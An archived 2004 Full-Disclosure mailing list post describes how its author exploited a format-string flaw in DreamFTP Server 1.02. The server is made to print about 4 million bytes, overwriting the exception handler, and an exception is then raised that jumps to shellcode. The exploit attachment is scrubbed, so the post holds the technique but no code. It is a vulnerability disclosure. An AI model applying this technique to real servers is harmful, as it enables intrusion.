lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Subject: DreamFTP Server 1.02 Buffer Overflow

Hi all,

badpack3t wasn't totally wrong when he called it a BoF because the
formatstring can cause BoFs. Anyway, it's a nice little formatstring to
exploit, with multiple possible attack vectors. I found it easiest to
overwrite the exception handler code (since it's RWE) and then cause an
exception.
The exploit sends about 375 bytes to the target, which causes DreamFTP to
print a string of about 4 million bytes to overwrite the SEH with the right
opcodes, it then causes an exception which transfers control to the SEH
which jumps to our shellcode.

Attached exploit has been tested with Win2k, other windows platforms have
not been tested. If it shouldn't work straight away some minor adjustments
can probably fix that. (Let me know)

Cheers,

SkyLined

----- Original Message ----- 
From: "badpack3t" <badpack3t@...urity-protocols.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Saturday, February 07, 2004 6:29
Subject: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow


<snip>
> Exploit:
>
> Not worth the time to debug and code an exploit.
>
<snip>

I find that hard to believe ;)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Nightmare.c
Type: application/octet-stream
Size: 4227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040211/f5be469f/Nightmare.obj

Powered by blists - more mailing lists